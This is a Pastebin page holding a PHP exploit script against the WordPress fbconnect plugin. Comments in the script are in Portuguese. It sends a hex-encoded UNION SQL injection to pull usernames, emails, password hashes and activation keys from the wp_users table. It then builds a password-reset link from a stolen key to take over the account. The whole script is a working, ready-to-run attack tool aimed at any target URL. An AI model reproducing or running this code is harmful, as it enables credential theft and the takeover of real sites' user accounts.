SHARE
TWEET

EXPLOIT CMS WORDPRESS / FBCONNECT BY googleinurl

Googleinurl Oct 6th, 2013 623 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3. /*
  4.   ###################################################################
  5.   EXPLOIT CMS WORDPRESS / FBCONNECT
  6.   By: GoogleINURL
  7.   ref:http://pastebin.com/fQbmiGer
  8.   ###################################################################
  9.  */
  10.  
  11.  
  12.  
  13.  
  14. error_reporting(0);
  15. set_time_limit(0);
  16. ini_set("default_socket_timeout", 5);
  17.  
  18. global $dados;
  19.  
  20. function msg($msg, $erro = NULL) {
  21.  
  22.     echo "<p><b>{$msg}</b></p>";
  23.     (isset($erro)) ? exit() : NULL;
  24. }
  25.  
  26. function montaUrlfinal($config, $dados) {
  27.     $config['url'] = (isset($config['url'])) ? $config['url'] . hex2bin('2F77702D6C6F67696E2E7068703F616374696F6E3D7270266B65793D5B4B45595D266C6F67696E3D5B4E4F4D455F5553554152494F5D') : msg('FALHA!', 1);
  28.     return str_replace(array('[NOME_USUARIO]','[KEY]'), $dados,$config['url']);
  29. }
  30.  
  31. function eviarPacote($config, $op) {
  32.  
  33.    $exploit['1'] = hex2bin('2F3F6662636F6E6E6563745F616374696F6E3D6D79686F6D652666627573657269643D312B616E642B313D322B756E696F6E2B73656C6563742B312C322C332C342C352C636F6E6361742830783743374337432C757365725F6C6F67696E2C30783743374337432C757365725F656D61696C2C30783743374337432C757365725F61637469766174696F6E5F6B65792C30783743374337432C757365725F706173732C3078374337433743292C372C382C392C31302C31312C31322B66726F6D2B77705F75736572732D2D');
  34.    $exploit['2'] = '/wp-login.php?action=lostpassword';
  35.     switch ($op) {
  36.         case '1':
  37.             msg('PEGANDO INFOS user_login');
  38.             $config['url'] = $config['url'] . $exploit['1'];
  39.             break;
  40.         case '2':
  41.             msg('DIGITAR DADOS');
  42.             $config['url'] = $config['url'] . $exploit['2'];
  43.             break;
  44.         default :
  45.             msg('ERRO DE EXECUÇÃO', 1);
  46.     }
  47.  
  48.  
  49.     $c = curl_init();
  50.     curl_setopt($c, CURLOPT_URL, $config['url']);
  51.     curl_setopt($c, CURLOPT_USERAGENT ,"Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)");
  52.     curl_setopt($c, CURLOPT_HEADER, 1);
  53.     curl_setopt($c, CURLOPT_NOBODY, 0);
  54.     curl_setopt($c, CURLOPT_COOKIEFILE,'cookie.txt');
  55.     curl_setopt($c, CURLOPT_COOKIEJAR,'cookie.txt');
  56.     curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1);
  57.     curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
  58.     curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
  59.     curl_setopt($c, CURLOPT_FRESH_CONNECT, 1);
  60.     curl_setopt($c, CURLOPT_VERBOSE, 1);
  61.  
  62.     $corpo = (curl_exec($c));
  63.    
  64.     if (isset($corpo)) {
  65.         return count(explode('|||', $corpo) > 1) ? explode('|||', $corpo) : msg('FALHA!', 1);
  66.     } else {
  67.         return msg('FALHA NA EXECUÇÃO', 1);
  68.     }
  69. }
  70.  
  71. if (isset($_GET['url']) && !empty($_GET['url'])) {
  72.    
  73.     $config['url'] = $_GET['url'];
  74.     $result = eviarPacote($config, 1);
  75.    
  76.     $dados['user'] = $result['1'];
  77.     $dados['key'] = $result['3'];
  78.     $url = montaUrlfinal($config,$dados);
  79.     echo "<a href='{$url}' target='_black'>{$url}</a>";
  80.    
  81.     msg("USER:::: {$dados['user']}").msg("EMAIL:::: {$result['2']}").msg("SENHA:::: {$result['4']}").msg("USE_ACTIVATION_KEY:::: {$dados['key']}");
  82.     echo "<iframe src='{$config['url']}/wp-login.php?action=lostpassword' width='900' height='900'>";
  83.        
  84. } else {
  85.     print"Defina a url alvo.\r\n";
  86.     unset($alvo);
  87.     exit();
  88. }
  89. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top